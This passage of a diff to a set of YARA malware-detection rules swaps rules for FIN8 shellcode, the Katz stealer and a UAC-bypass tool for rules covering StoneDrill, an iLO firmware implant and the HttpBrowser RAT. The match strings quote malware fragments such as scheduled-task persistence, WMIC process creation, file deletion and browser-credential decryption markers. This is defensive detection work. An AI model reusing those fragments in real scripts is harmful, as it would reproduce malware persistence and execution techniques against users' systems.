+		uint16( 0 ) == 0x5A4D and all of them and filesize < 700000 and pe.number_of_sections > 4 and pe.number_of_resources > 1 and pe.number_of_resources < 15 and for any i in ( 0 .. pe.number_of_resources - 1 ) : ( ( math.entropy ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) > 7.8 ) and pe.resources [ i ] . id == 101 and pe.resources [ i ] . length > 20000 and pe.resources [ i ] . language == 0 and not ( $mz in ( pe.resources [ i ] . offset..pe.resources [ i ] . offset + pe.resources [ i ] . length ) ) )
+}
+rule SIGNATURE_BASE_Stonedrill_Main_Sub : FILE
+{
+	meta:
+		description = "Rule to detect StoneDrill (decrypted) samples"
+		author = "Kaspersky Lab"
+		id = "92f53e6a-8f49-5ffa-8c16-3ec3e6f2bdcd"
+		date = "2017-03-07"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stonedrill.yar#L43-L56"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "794094c0cbb81f6f971e16de36d444351b17cf38a91d8210f914b80da7d9ed26"
 		score = 75
-		quality = 81
+		quality = 85
+		tags = "FILE"
+		hash1 = "d01781f1246fd1b64e09170bd6600fe1"
+		hash2 = "ac3c25534c076623192b9381f926ba0d"
+		version = "1.0"
+
+	strings:
+		$code = {B8 08 00 FE 7F FF 30 8F 44 24 ?? 68 B4 0F 00 00 FF 15 ?? ?? ?? 00 B8 08 00 FE 7F FF 30 8F 44 24 ?? 8B ?? 24 [1 - 4] 2B ?? 24 [6] F7 ?1 [5 - 12] 00}
+
+	condition:
+		uint16( 0 ) == 0x5A4D and $code and filesize < 5000000
+}
+rule SIGNATURE_BASE_Stonedrill_BAT_1 : FILE
+{
+	meta:
+		description = "Rule to detect Batch file from StoneDrill report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "92f53e6a-8f49-5ffa-8c16-3ec3e6f2bdcd"
+		date = "2017-03-07"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stonedrill.yar#L65-L80"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "d7263a527cae45072082c0f2fd0abc33acb2a25b34c06becf36fbd36f0697d5c"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a9f1375da973b229eb649dc3c07484ae7513032b79665efe78c0e55a6e716821"
 
 	strings:
-		$x1 = "cmd /c schtasks /query /tn TimeUpdate > NUL 2>&1" ascii
-		$x2 = "schtasks /create /sc minute /mo 0002 /tn TimeUpdate /tr" fullword ascii
-		$x3 = "-c  SampleDomain.com -m scheduleminutes" fullword ascii
-		$x4 = ".ntpupdateserver.com" fullword ascii
-		$x5 = ".msoffice365update.com" fullword ascii
-		$s1 = "out.exe" fullword ascii
-		$s2 = "\\Win32Project1\\Release\\Win32Project1.pdb" ascii
-		$s3 = "C:\\windows\\system32\\cmd.exe /c (" ascii
-		$s4 = "Content-Disposition: form-data; name=\"file\"; filename=\"a.a\"" fullword ascii
-		$s5 = "Agent configured successfully" fullword ascii
-		$s6 = "\\runlog*" ascii
-		$s7 = "can not specify username!!" fullword ascii
-		$s8 = "Agent can not be configured" fullword ascii
-		$s9 = "%08lX%04hX%04hX%02hhX%02hhX%02hhX%02hhX%02hhX%02hhX%02hhX%02hhX" fullword ascii
-		$s10 = "!!! can not create output file !!!" fullword ascii
+		$s1 = "set u100=" ascii
+		$s2 = "set u200=service" ascii fullword
+		$s3 = "set u800=%~dp0" ascii fullword
+		$s4 = "\"%systemroot%\\system32\\%u100%\"" ascii
+		$s5 = "%\" start /b %systemroot%\\system32\\%" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( pe.imphash ( ) == "538805ecd776b9a42e71aebf94fde1b1" or pe.imphash ( ) == "861ac226fbe8c99a2c43ff451e95da97" or ( 1 of ( $x* ) or 3 of them ) )
+		uint32( 0 ) == 0x68636540 and 2 of them and filesize < 500
 }
-rule SIGNATURE_BASE_Shellcode_Apihashing_FIN8_1
+rule SIGNATURE_BASE_Stonedrill_Service_Install : FILE
 {
 	meta:
-		description = "Detects FIN8 Shellcode APIHashing"
-		author = "Frank Boldewin (@r3c0nst)"
-		id = "bca5601c-2998-545b-8dd0-ec3c861e6291"
-		date = "2021-03-16"
+		description = "Rule to detect Batch file from StoneDrill report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "92f53e6a-8f49-5ffa-8c16-3ec3e6f2bdcd"
+		date = "2017-03-07"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stonedrill.yar#L82-L96"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "52abe90c7f87ffeace4b58f9959e5a21c475bfa7ae2c5bc2744fe5fe43ffdda8"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s1 = "127.0.0.1 >nul && sc config" ascii
+		$s2 = "LocalService\" && ping -n" ascii fullword
+		$s3 = "127.0.0.1 >nul && sc start" ascii fullword
+		$s4 = "sc config NtsSrv binpath= \"C:\\WINDOWS\\system32\ntssrvr64.exe" ascii
+
+	condition:
+		2 of them and filesize < 500
+}
+rule SIGNATURE_BASE_Stonedrill_Ntssrvr32 : FILE
+{
+	meta:
+		description = "Detects malware from StoneDrill threat report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "92f53e6a-8f49-5ffa-8c16-3ec3e6f2bdcd"
+		date = "2017-03-07"
+		modified = "2023-01-27"
+		reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stonedrill.yar#L98-L118"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "f1122aba53f32b10bd5f43cb619aa5d668b1457f3a5ea2a68c97254ab8631faa"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "394a7ebad5dfc13d6c75945a61063470dc3b68f7a207613b79ef000e1990909b"
+
+	strings:
+		$s1 = "g\\system32\\" wide
+		$s2 = "ztvttw" fullword wide
+		$s3 = "lwizvm" fullword ascii
+		$op1 = { 94 35 77 73 03 40 eb e9 }
+		$op2 = { 80 7c 41 01 00 74 0a 3d }
+		$op3 = { 74 0a 3d 00 94 35 77 }
+
+	condition:
+		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and 3 of them )
+}
+rule SIGNATURE_BASE_Stonedrill_Malware_2 : FILE
+{
+	meta:
+		description = "Detects malware from StoneDrill threat report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "92f53e6a-8f49-5ffa-8c16-3ec3e6f2bdcd"
+		date = "2017-03-07"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stonedrill.yar#L120-L145"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "cb1f8b24465ad8ca19dd540b1f8b63a73bc2624958bf45547b15c10583d07281"
+		score = 75
+		quality = 60
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "69530d78c86031ce32583c6800f5ffc629acacb18aac4c8bb5b0e915fc4cc4db"
+
+	strings:
+		$s1 = "cmd /c WMIC Process Call Create \"C:\\Windows\\System32\\Wscript.exe //NOLOGO " fullword wide
+		$s2 = "C:\\ProgramData\\InternetExplorer" fullword wide
+		$s3 = "WshShell.CopyFile \"" fullword wide
+		$s4 = "Abd891.tmp" fullword wide
+		$s5 = "Set WshShell = Nothing" fullword wide
+		$s6 = "AaCcdDeFfGhiKLlMmnNoOpPrRsSTtUuVvwWxyZz32" fullword ascii
+		$s7 = "\\FileInfo.txt" wide
+		$x1 = "C-PDI-C-Cpy-T.vbs" fullword wide
+		$x2 = "C-Dlt-C-Org-T.vbs" fullword wide
+		$x3 = "C-PDC-C-Cpy-T.vbs" fullword wide
+		$x4 = "AC-PDC-C-Cpy-T.vbs" fullword wide
+		$x5 = "C-Dlt-C-Trsh-T.tmp" fullword wide
+
+	condition:
+		( uint16( 0 ) == 0x5a4d and filesize < 700KB and ( 1 of ( $x* ) or 3 of ( $s* ) ) ) or 5 of them
+}
+rule SIGNATURE_BASE_Stonedrill : FILE
+{
+	meta:
+		description = "Detects malware from StoneDrill threat report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "92f53e6a-8f49-5ffa-8c16-3ec3e6f2bdcd"
+		date = "2017-03-07"
 		modified = "2023-12-05"
-		reference = "https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin8.yar#L1-L19"
+		reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stonedrill.yar#L147-L170"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5d47119a588aa69b3e241618d6dbb9df6117a6751bbff39a1f95340bc26611a7"
+		logic_hash = "ef7173e259f985083d5451a2d464047b40112a084a05d471797d5dbf2d0fb21d"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "2bab3716a1f19879ca2e6d98c518debb107e0ed8e1534241f7769193807aac83"
+		hash2 = "62aabce7a5741a9270cddac49cd1d715305c1d0505e620bbeaec6ff9b6fd0260"
+		hash3 = "69530d78c86031ce32583c6800f5ffc629acacb18aac4c8bb5b0e915fc4cc4db"
 
 	strings:
-		$APIHashing32bit1 = {81 F7 99 5D 52 69 81 F3 30 D7 00 AB}
-		$APIHashing32bit2 = {68 F2 55 03 88 68 65 19 6D 1E}
-		$APIHashing32bit3 = {68 9B 59 27 21 C1 E9 17 33 4C 24 10 68 37 5C 32 F4}
-		$APIHashing64bit1 = {49 BF 65 19 6D 1E F2 55 03 88 49 BE 37 5C 32 F4 9B 59 27 21}
-		$APIHashing64bit2 = {48 B8 99 5D 52 69 30 D7 00 AB}
+		$x1 = "C-Dlt-C-Trsh-T.tmp" fullword wide
+		$x2 = "C-Dlt-C-Org-T.vbs" fullword wide
+		$s1 = "Hello dear" fullword ascii
+		$s2 = "WRZRZRAR" fullword ascii
+		$opa1 = { 66 89 45 d8 6a 64 ff }
+		$opa2 = { 8d 73 01 90 0f bf 51 fe }
 
 	condition:
-		all of ( $APIHashing32bit* ) or all of ( $APIHashing64bit* )
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and 1 of ( $x* ) or ( all of ( $op* ) and all of ( $s* ) )
 }
-rule SIGNATURE_BASE_PUP_Installrex_Antifwb : FILE
+rule SIGNATURE_BASE_Stonedrill_VBS_1 : FILE
 {
 	meta:
-		description = "Malware InstallRex / AntiFW"
+		description = "Detects malware from StoneDrill threat report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b327527e-8b88-5292-933b-102bd76df4eb"
-		date = "2015-05-13"
+		id = "a7ee3bd4-eeae-5eb4-92e7-9601ec17300a"
+		date = "2017-03-07"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_antifw_installrex.yar#L2-L19"
+		reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stonedrill.yar#L172-L192"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "bb5607cd2ee51f039f60e32cf7edc4e21a2d95cd"
-		logic_hash = "04f25497ee9a9af20179b81679d993315d6bb3d7bf7d8e9cbb01374395019610"
-		score = 55
+		logic_hash = "79416d27a6a09d544becd84f8e551c09b94c97181f8fddc481f47e42763d47ac"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0f4d608a87e36cb0dbf1b2d176ecfcde837070a2b2a049d532d3d4226e0c9587"
 
 	strings:
-		$s4 = "Error %u while loading TSU.DLL %ls" fullword ascii
-		$s7 = "GetModuleFileName() failed => %u" fullword ascii
-		$s8 = "TSULoader.exe" fullword wide
-		$s15 = "\\StringFileInfo\\%04x%04x\\Arguments" wide
-		$s17 = "Tsu%08lX.dll" fullword wide
+		$x1 = "wmic /NameSpace:\\\\root\\default Class StdRegProv Call SetStringValue hDefKey = \"&H80000001\" sSubKeyName = \"Software\\Micros" ascii
+		$x2 = "ping 1.0.0.0 -n 1 -w 20000 > nul" fullword ascii
+		$s1 = "WshShell.CopyFile \"%COMMON_APPDATA%\\Chrome\\" ascii
+		$s2 = "WshShell.DeleteFile \"%temp%\\" ascii
+		$s3 = "WScript.Sleep(10 * 1000)" fullword ascii
+		$s4 = "Set WshShell = CreateObject(\"Scripting.FileSystemObject\") While WshShell.FileExists(\"" ascii
+		$s5 = " , \"%COMMON_APPDATA%\\Chrome\\" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		( filesize < 1KB and 1 of ( $x* ) or 2 of ( $s* ) )
 }
-rule SIGNATURE_BASE_MAL_Katz_Stealer_May25 : FILE
+rule SIGNATURE_BASE_APT_MAL_HP_Ilo_Firmware_Dec21_1 : FILE
 {
 	meta:
-		description = "Detects Katz stealer"
-		author = "MalGamy (Nextron Systems)"
-		id = "efa42aec-b653-5e94-8d5b-73f0aab2a54d"
-		date = "2025-05-16"
-		modified = "2025-05-22"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_katz_stealer.yar#L1-L21"
+		description = "Detects suspicios ELF files with sections as described in malicious iLO Board analysis by AmnPardaz in December 2021"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7f5fa905-07a3-55da-b644-c5ab882b4a9d"
+		date = "2021-12-28"
+		modified = "2023-12-05"
+		reference = "https://threats.amnpardaz.com/en/2021/12/28/implant-arm-ilobleed-a/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_mal_ilo_board_elf.yar#L2-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "fdc86a5b3d7df37a72c3272836f743747c47bfbc538f05af9ecf78547fa2e789"
-		hash = "d92bb6e47cb0a0bdbb51403528ccfe643a9329476af53b5a729f04a4d2139647"
-		logic_hash = "73364c2291dc792f46858dda057f08805db55fe1f1e54d6b0dee0a0c8a412259"
+		logic_hash = "7e959d07d864a485b8cc7765f9e12869ff34747ab552e26244eb28f510d1051f"
 		score = 80
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = "Motherboard Product: %s" ascii
-		$s2 = "cmd.exe /c %s" ascii
-		$s3 = "reg export \"%s\" \"%s\" /y" ascii
-		$s4 = ").request({ hostname: '" ascii
-		$s5 = "Type: Removable"
-		$s6 = "%s\\Microsoft\\Windows Live Mail" ascii
+		$s1 = ".newelf.elf.text" ascii
+		$s2 = ".newelf.elf.libc.so.data" ascii
+		$s3 = ".newelf.elf.Initial.stack" ascii
+		$s4 = ".newelf.elf.libevlog.so.data" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and 4 of them
+		filesize < 5MB and 2 of them or all of them
 }
-rule SIGNATURE_BASE_MAL_DLL_Chrome_App_Bound_Encryption_Decryption_May25 : FILE
+rule SIGNATURE_BASE_Httpbrowser_RAT_Dropper_Gen1 : FILE
 {
 	meta:
-		description = "Detects a DLL used to decrypt App-Bound Encrypted (ABE) cookies, passwords and payment methods from Chromium-based browsers. Seen being used by Katz stealer"
-		author = "MAlGamy"
-		id = "bc77e972-fd7e-55dd-b118-ee76f19cde1a"
-		date = "2025-05-19"
-		modified = "2025-05-22"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_katz_stealer.yar#L23-L41"
+		description = "Threat Group 3390 APT Sample - HttpBrowser RAT Dropper"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2e347024-ac5f-5e8c-a8b0-53eaa9a03979"
+		date = "2015-08-06"
+		modified = "2023-12-05"
+		reference = "http://snip.ly/giNB"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_threatgroup_3390.yar#L8-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6dc8e99da68b703e86fa90a8794add87614f254f804a8d5d65927e0676107a9d"
-		logic_hash = "d5488728a3ee8f2f59ed9798b80d516f7f131e39b3d5099ad5168ffc8ff22718"
-		score = 80
+		logic_hash = "927821e974cff6cd4d15b19bf4d0486abc57725ecdf6f00755dd4f912fbf82d1"
+		score = 70
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "808de72f1eae29e3c1b2c32be1b84c5064865a235866edf5e790d2a7ba709907"
+		hash2 = "f6f966d605c5e79de462a65df437ddfca0ad4eb5faba94fc875aba51a4b894a7"
+		hash3 = "f424965a35477d822bbadb821125995616dc980d3d4f94a68c87d0cd9b291df9"
+		hash4 = "01441546fbd20487cb2525a0e34e635eff2abe5c3afc131c7182113220f02753"
+		hash5 = "8cd8159f6e4689f572e2087394452e80e62297af02ca55fe221fe5d7570ad47b"
+		hash6 = "10de38419c9a02b80ab7bf2f1f1f15f57dbb0fbc9df14b9171dc93879c5a0c53"
+		hash7 = "c2fa67e970d00279cec341f71577953d49e10fe497dae4f298c2e9abdd3a48cc"
 
 	strings:
-		$s1 = "Failed to set proxy blanket." ascii
-		$s2 = "Decryption failed. Last error:" ascii
-		$s3 = "\\Google\\Chrome\\User Data\\Local State" ascii
-		$op1 = {48 39 F3 74 ?? 4C 89 E2 48 89 E9 E8 ?? ?? ?? ?? 48 89 C1 48 8B 00 B2 ?? 48 8B 40 ?? 48 C7 44 01 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 13 48 89 C1 E8 ?? ?? ?? ?? 48 FF C3 EB ?? 48 8D 54 24 ?? 48 89 F9 E8 ?? ?? ?? ?? 48 89 E9 E8 ?? ?? ?? ?? 48 89 F8 48 81 C4}
+		$x1 = "1001=cmd.exe" fullword ascii
+		$x2 = "1003=ShellExecuteA" fullword ascii
+		$x3 = "1002=/c del /q %s" fullword ascii
+		$x4 = "1004=SetThreadPriority" fullword ascii
+		$op0 = { e8 71 11 00 00 83 c4 10 ff 4d e4 8b f0 78 07 8b }
+		$op1 = { e8 85 34 00 00 59 59 8b 86 b4 }
+		$op2 = { 8b 45 0c 83 38 00 0f 84 97 }
+		$op3 = { 8b 45 0c 83 38 00 0f 84 98 }
+		$op4 = { 89 7e 0c ff 15 a0 50 40 00 59 8b d8 6a 20 59 8d }
+		$op5 = { 56 8d 85 cd fc ff ff 53 50 88 9d cc fc ff ff e8 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2MB and $op1 and 1 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of ( $x* ) and 1 of ( $op* )
 }
-rule SIGNATURE_BASE_SUSP_Katz_Log_May25 : FILE
+rule SIGNATURE_BASE_Httpbrowser_RAT_Sample1 : FILE
 {
 	meta:
-		description = "Detects log file that contains system reconnaissance data, seen being generated by Katz stealer"
-		author = "MalGamy"
-		id = "29ef2f42-d360-59f9-bb70-b0c68f9dfb7c"
-		date = "2025-05-20"
-		modified = "2025-05-22"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_katz_stealer.yar#L43-L63"
+		description = "Threat Group 3390 APT Sample - HttpBrowser RAT Sample update.hancominc.com"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8babf47f-006c-5001-9753-08ac08f5e861"
+		date = "2015-08-06"
+		modified = "2023-12-05"
+		reference = "http://snip.ly/giNB"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_threatgroup_3390.yar#L50-L65"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1ac196ac6393d786618c944a7ab77fb189a6b4ba00af5c0f987c3dc65876c060"
-		hash = "ad76e2727469525dec7e56977589dd250ca57a29b8b0d42cd5c42e536c285241"
-		hash = "e1a0d6929662bcbc9e5e0827cb8b6d7818088e996cf971d2a4a1c1ca4208e533"
-		hash = "b10796c41e1cec7c84a3c68bfcaa7b20f49b620d1c94304a6b3ed73471fa9031"
-		hash = "5a984e2e308fe84e4e2071dd877772361719ba0217c2c23da79dbb82dc15eac8"
-		logic_hash = "847ab8f9a7abf260f4185d41ae9cb9af40c28726338ff2306a75d2160ae61f03"
-		score = 65
+		logic_hash = "746df577e952e0354342a48fe9f1650e63e3470902e7c5bba36d36fa34ea2bff"
+		score = 80
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "be334d1f8fa65a723af65200a166c2bbdb06690c8b30fafe772600e4662fc68b"
+		hash2 = "1052ad7f4d49542e4da07fa8ea59c15c40bc09a4d726fad023daafdf05866ebb"
 
 	strings:
-		$s1 = "Motherboard Manufacturer:" ascii
-		$s2 = "===== System Information =====" ascii
-		$s3 = "Volume Name:" ascii
-		$s4 = "Desktop Hostname:" ascii
+		$s0 = "update.hancominc.com" fullword wide
 
 	condition:
-		filesize < 50KB and 3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and $s0
 }
-rule SIGNATURE_BASE_MAL_NET_Katz_Stealer_Loader_May25
+rule SIGNATURE_BASE_Httpbrowser_RAT_Sample2 : FILE
 {
 	meta:
-		description = "Detects .NET based Katz stealer loader"
-		author = "Jonathan Peters (cod3nym)"
-		id = "90e86bb2-ffb2-5968-9cdc-705efac73b0d"
-		date = "2025-05-21"
-		modified = "2025-05-22"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_katz_stealer.yar#L65-L84"
+		description = "Threat Group 3390 APT Sample - HttpBrowser RAT Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "693d381f-50b0-5f06-b725-78243b67092c"
+		date = "2015-08-06"
+		modified = "2023-12-05"
+		reference = "http://snip.ly/giNB"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_threatgroup_3390.yar#L67-L84"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0df13fd42fb4a4374981474ea87895a3830eddcc7f3bd494e76acd604c4004f7"
-		logic_hash = "1922520d8c34660a0afff2f552ef0d1c6ec093fb10a00816e0216f574b686221"
+		logic_hash = "c7e945131a867bf46a467784d7119c95342733cc723cdeeb76d69c8fdb326749"
 		score = 80
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c57c5a2c322af2835ae136b75283eaaeeaa6aa911340470182a9983ae47b8992"
 
 	strings:
-		$x = "ExecutarMetodoVAI" ascii
-		$s1 = "VirtualMachineDetector" ascii
-		$s2 = "Wow64SetThreadContext_API" ascii
-		$s3 = "nomedoarquivo" ascii
-		$s4 = { 65 78 74 65 6E C3 A7 61 6F 00 }
-		$s5 = "payloadBuffer" ascii
-		$s6 = "caminhovbs" ascii
+		$s0 = "nKERNEL32.DLL" fullword wide
+		$s1 = "WUSER32.DLL" fullword wide
+		$s2 = "mscoree.dll" fullword wide
+		$s3 = "VPDN_LU.exeUT" fullword ascii
 
 	condition:
-		3 of ( $s* ) or $x
+		uint16( 0 ) == 0x5a4d and filesize < 250KB and all of them
 }
-rule SIGNATURE_BASE_MAL_NET_UAC_Bypass_May25 : FILE
+rule SIGNATURE_BASE_Httpbrowser_RAT_Gen : FILE
 {
 	meta:
-		description = "Detects .NET based tool abusing legitimate Windows utility cmstp.exe to bypass UAC (User-Admin-Controls)"
-		author = "Jonathan Peters (cod3nym)"
-		id = "5d714088-c917-51b5-b422-1d8fa00b1949"
-		date = "2025-05-21"
-		modified = "2025-05-22"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_katz_stealer.yar#L86-L103"
+		description = "Threat Group 3390 APT Sample - HttpBrowser RAT Generic"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0ba9facb-7385-56ce-9e20-d86261a39cd1"
+		date = "2015-08-06"
+		modified = "2023-12-05"
+		reference = "http://snip.ly/giNB"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_threatgroup_3390.yar#L86-L124"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4f12c5dca2099492d0c0cd22edef841cbe8360af9be2d8e9b57c2f83d401c1a7"
-		hash = "fcad234dc2ad5e2d8215bcf6caac29aef62666c34564e723fa6d2eee8b6468ed"
-		logic_hash = "4a3f6e90af6f9a8a4dfa8e336eb8c714e5f02625ca2bf5bf8b1bca9cbda6a99e"
-		score = 80
+		logic_hash = "cbc1dec88994427fc5003c9506f5a766531136ee80a16d00d2bf5bd5d7990cb3"
+		score = 90
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0299493ccb175d452866f5e21d023d3e92cd8d28452517d1d19c0f05f2c5ca27"
+		hash2 = "065d055a90da59b4bdc88b97e537d6489602cb5dc894c5c16aff94d05c09abc7"
+		hash3 = "05c7291db880f94c675eea336ecd66338bd0b1d49ad239cc17f9df08106e6684"
+		hash4 = "07133f291fe022cd14346cd1f0a649aa2704ec9ccadfab809ca9c48b91a7d81b"
+		hash5 = "0f8893e87ddec3d98e39a57f7cd530c28e36d596ea0a1d9d1e993dc2cae0a64d"
+		hash6 = "108e6633744da6efe773eb78bd0ac804920add81c3dde4b26e953056ac1b26c5"
+		hash7 = "1052ad7f4d49542e4da07fa8ea59c15c40bc09a4d726fad023daafdf05866ebb"
+		hash8 = "1277ede988438d4168bb5b135135dd3b9ae7d9badcdf1421132ca4692dd18386"
+		hash9 = "19be90c152f7a174835fd05a0b6f722e29c648969579ed7587ae036679e66a7b"
+		hash10 = "1e7133bf5a9fe5e462321aafc2b7770b8e4183a66c7fef14364a0c3f698a29af"
+		hash11 = "2264e5e8fcbdcb29027798b200939ecd8d1d3ad1ef0aef2b8ce7687103a3c113"
+		hash12 = "2a1bdeb0a021fb0bdbb328bd4b65167d1f954c871fc33359cb5ea472bad6e13e"
+		hash13 = "259a2e0508832d0cf3f4f5d9e9e1adde17102d2804541a9587a9a4b6f6f86669"
+		hash14 = "240d9ce148091e72d8f501dbfbc7963997d5c2e881b4da59a62975ddcbb77ca2"
+		hash15 = "211a1b195cf2cc70a2caf8f1aafb8426eb0e4bae955e85266490b12b5322aa16"
+		hash16 = "2d25c6868c16085c77c58829d538b8f3dbec67485f79a059f24e0dce1e804438"
+		hash17 = "2d932d764dd9b91166361d8c023d64a4480b5b587a6087b0ce3d2ac92ead8a7d"
+		hash18 = "3556722d9aa37beadfa6ba248a66576f767e04b09b239d3fb0479fa93e0ba3fd"
+		hash19 = "365e1d4180e93d7b87ba28ce4369312cbae191151ac23ff4a35f45440cb9be48"
+		hash20 = "36c49f18ce3c205152eef82887eb3070e9b111d35a42b534b2fb2ee535b543c0"
+		hash21 = "3eeb1fd1f0d8ab33f34183893c7346ddbbf3c19b94ba3602d377fa2e84aaad81"
+		hash22 = "3fa8d13b337671323e7fe8b882763ec29b6786c528fa37da773d95a057a69d9a"
 
 	strings:
-		$x1 = "CmstpBypass" ascii
